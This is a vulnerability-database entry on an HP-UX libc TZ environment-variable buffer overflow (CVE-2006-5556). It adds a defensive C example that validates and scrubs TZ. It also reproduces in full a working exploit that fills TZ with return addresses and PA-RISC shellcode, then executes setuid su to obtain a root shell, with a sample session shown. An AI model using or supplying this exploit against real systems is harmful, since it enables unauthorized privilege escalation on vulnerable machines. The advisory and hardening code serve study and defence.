HP-UX libc TZ Environment Variable Local Overflow Vulnerability

Vulnerability ID: 1111375    Vulnerability type: Buffer overflow
Published: 2006-10-24    Updated: 2006-10-30
CVE: CVE-2006-5556    CNNVD ID: CNNVD-200610-481
Platform: HP-UX    CVSS score: 4.6
|Vulnerability sources
https://www.exploit-db.com/exploits/2636
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-481
|Vulnerability details
HP-UX is a UNIX operating system developed by HP. The HP-UX libc implementation contains a buffer overflow in its handling of the TZ environment variable, which a local attacker can exploit to escalate privileges. Because localtime_r() and related functions do not perform sufficient bounds checking, HP-UX libc overflows a stack buffer when it processes an over-long TZ value. Any suid or sgid program that calls the timezone functions is affected, since it inherits TZ from the unprivileged caller's environment. A successful attack yields privilege escalation; the published exploit below demonstrates this against /usr/bin/su on HP-UX B.11.11 (PA-RISC), passing a TZ value of roughly 3.4 KB whose tail is the shellcode.
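The two defensive patterns that this bug class calls for, as an added example (this is not code from the exploit author, from HP, or from the HP-UX libc fix): a libc-side bounded copy that refuses a TZ value that does not fit its buffer, and a check a setuid/setgid program can run over its inherited environment before any time function is called, so a hostile TZ never reaches libc. The limit TZ_SAFE_MAX (128 bytes) and the allowed character set (POSIX TZ syntax plus ':' and '/' for zone-file names) are assumptions chosen for this example; the hostile sample is constructed here in the shape of the exploit's TZ value and carries no real payload.

```c
/* Added example: defences against an over-long TZ reaching libc.
 * Not part of the original exploit or of HP-UX; limits are assumptions. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

#define TZ_SAFE_MAX 128   /* assumed conservative bound; no real zone spec is near it */

/* Libc-side pattern: copy TZ into a fixed-size buffer only if it fits.
 * Returns 0 on success, -1 if src would not fit (caller falls back to UTC). */
int tz_copy_bounded(char *dst, size_t dstsz, const char *src)
{
    size_t n = strlen(src);
    if (dstsz == 0 || n >= dstsz)
        return -1;                         /* refuse rather than overflow or silently truncate */
    memcpy(dst, src, n + 1);
    return 0;
}

/* Privileged-program-side check: does this TZ value look like a legitimate
 * POSIX TZ string or zone-file name? Rejects over-long values, path
 * traversal and any byte outside the TZ alphabet (shellcode is never alnum). */
int tz_env_is_acceptable(const char *tz)
{
    size_t i, n;
    if (tz == NULL)
        return 1;                          /* no TZ: libc uses the system default */
    n = strlen(tz);
    if (n == 0 || n > TZ_SAFE_MAX)
        return 0;                          /* the exploit above needs ~3.4 KB */
    if (strstr(tz, "..") != NULL)
        return 0;                          /* ":../../x" into a zone-file loader */
    for (i = 0; i < n; i++) {
        unsigned char c = (unsigned char)tz[i];
        if (isalnum(c) || strchr(":/+-,._", c) != NULL)
            continue;
        return 0;
    }
    return 1;
}

/* Remove unacceptable "TZ=" entries from a NULL-terminated envp array in
 * place (the array an exec wrapper would pass to execve). Returns the number
 * removed. In a program that does not exec, unsetenv("TZ") is the equivalent. */
int scrub_tz_from_envp(char **envp)
{
    int removed = 0;
    char **rd, **wr;
    for (rd = wr = envp; *rd != NULL; rd++) {
        if (strncmp(*rd, "TZ=", 3) == 0 && !tz_env_is_acceptable(*rd + 3)) {
            removed++;
            continue;
        }
        *wr++ = *rd;
    }
    *wr = NULL;
    return removed;
}

/* Constructed sample in the shape of the exploit's TZ value: "TZ=" followed by
 * filler_len bytes of a repeated 4-byte pattern and a shellcode-like tail.
 * No working payload; only the shape matters for the checks. Caller frees. */
char *build_hostile_tz_entry(size_t filler_len)
{
    static const unsigned char filler[4] = { 0x05, 0x9c, 0x7f, 0x7f };
    static const char tail[] = "\xeb\x5f/bin/sh";       /* 9 bytes + NUL */
    char *s = malloc(3 + filler_len + sizeof tail);
    size_t i;
    if (s == NULL)
        return NULL;
    memcpy(s, "TZ=", 3);
    for (i = 0; i < filler_len; i++)
        s[3 + i] = (char)filler[i % 4];
    memcpy(s + 3 + filler_len, tail, sizeof tail);       /* copies the NUL too */
    return s;
}

int main(void)
{
    char buf[TZ_SAFE_MAX];
    char *envp[4];
    char *hostile = build_hostile_tz_entry(2384);
    if (hostile == NULL)
        return 1;
    envp[0] = "PATH=/usr/bin"; envp[1] = hostile; envp[2] = "HOME=/"; envp[3] = NULL;
    printf("legit TZ accepted:   %d\n", tz_env_is_acceptable("EST5EDT,M3.2.0,M11.1.0"));
    printf("hostile TZ accepted: %d (len %zu)\n", tz_env_is_acceptable(hostile + 3),
           strlen(hostile + 3));
    printf("bounded copy:        %d\n", tz_copy_bounded(buf, sizeof buf, hostile + 3));
    printf("entries scrubbed:    %d\n", scrub_tz_from_envp(envp));
    free(hostile);
    return 0;
}
```

The environment scrub belongs at the very top of main() in any setuid program, before the first call into localtime(), mktime() or tzset(); a wrapper that re-execs a privileged binary applies it to the envp it builds, which is exactly the vector the exploit uses with execle().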
|Exploit (EXP)
/* HP-UX libc timezone environment overflow exploit
 * ================================================
 * HP-UX libc contains an exploitable stack overflow
 * in the handling of "TZ" environment variable. The
 * problem occurs due to insufficient bounds checking
 * in the localtime_r() and related functions. Any suid
 * or sgid program which uses the timezone functions can
 * be used as an attack vector. This exploit uses "su"
 * to obtain root privileges.
 *
 * Example. 
 * $ cc prdelka-vs-HPUX-libc.c -o prdelka-vs-HPUX-libc
 * /usr/ccs/bin/ld: (Warning) At least one PA 2.0 object file 
 * (prdelka-vs-HPUX-libc.o) was detected. The linked output may not run 
 * on a PA 1.x system.
 * $ uname -a
 * HP-UX hpux B.11.11 U 9000/785 2012383315 unlimited-user license
 * $ id
 * uid=102(user) gid=20(users)
 * $ ./prdelka-vs-HPUX-libc
 * [ HP-UX libc timezone environment overflow
 * Password:
 * # id
 * uid=102(user) gid=20(users) euid=0(root)
 *
 * - prdelka
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* PA-RISC shellcode that executes /bin/sh (the exploit author's payload). */
char shellcode[]="\xeb\x5f\x1f\xfd\x0b\x39\x02\x99\xb7\x5a\x40\x22"
		 "\x0f\x40\x12\x0e\x20\x20\x08\x01\xe4\x20\xe0\x08"
		 "\xb4\x16\x70\x16""/bin/sh";

int main(void){
        char *a, *b, *envp[4];
        int i;
        /* The 4-byte values the original stored through (unsigned long *)
         * casts, written out in PA-RISC (big-endian) byte order so the build
         * does not depend on the host's word size or endianness. The author
         * does not document which stack locations each value targets. */
        unsigned char adr[4]  = {0x10,0xec,0x7f,0x7f};
        unsigned char ptr1[4] = {0x05,0x9c,0x7f,0x7f};
        unsigned char ptr2[4] = {0x7f,0x7f,0x05,0x9c};

        /* PATH and MANPATH carry filler only; they pad the environment area
         * so that TZ lands where the author expects it. */
        b=(char*)malloc(126);
        memset(b,0,126);
        a=b;
        sprintf(b,"PATH=");
        b+=5;
        for(i=0;i<120;i++) *b++=ptr1[i%4];
        envp[0]=a;

        b=(char*)malloc(809);
        memset(b,0,809);
        a=b;
        sprintf(b,"MANPATH=");
        b+=8;
        for(i=0;i<800;i++) *b++=ptr1[i%4];
        envp[1]=a;

        /* TZ is the overflowing value: 3 + 2384 + 4 + 1002 + 35 bytes plus the
         * NUL = 3429. Filler, one distinguished word, a 1002-byte run of the
         * repeated address, then the shellcode at the very end. */
        b=(char*)malloc(3429);
        memset(b,0,3429);        /* original zeroed only 3427 bytes, leaving the NUL unset */
        a=b;
        sprintf(b,"TZ=");
        b+=3;
        for(i=0;i<2384;i++) *b++=ptr1[i%4];
        for(i=0;i<4;i++) *b++=ptr2[i%4];
        for(i=0;i<1002;i++) *b++=adr[i%4];
        for(i=0;i<(int)strlen(shellcode);i++) *b++=shellcode[i];
        envp[2]=a;
        envp[3]=0;               /* original declared envp[3] and wrote one past its end */

        printf("[ HP-UX libc timezone environment overflow\n");
        /* su is setuid root and calls the libc timezone functions, which parse
         * the inherited TZ. argv[0] is arbitrary. */
        execle("/usr/bin/su","pdk",(char*)0,envp);
        perror("execle");
        return 1;
}

// milw0rm.com [2006-10-24]
|References

Source: BID
Name: 20718
Link: http://www.securityfocus.com/bid/20718
Source: XF
Name: hpux-timezone-bo(29777)
Link: http://xforce.iss.net/xforce/xfdb/29777
Source: MILW0RM
Name: 2636
Link: http://www.milw0rm.com/exploits/2636
Source: MISC
Link: http://blogs.23.nu/prdelka/stories/13144/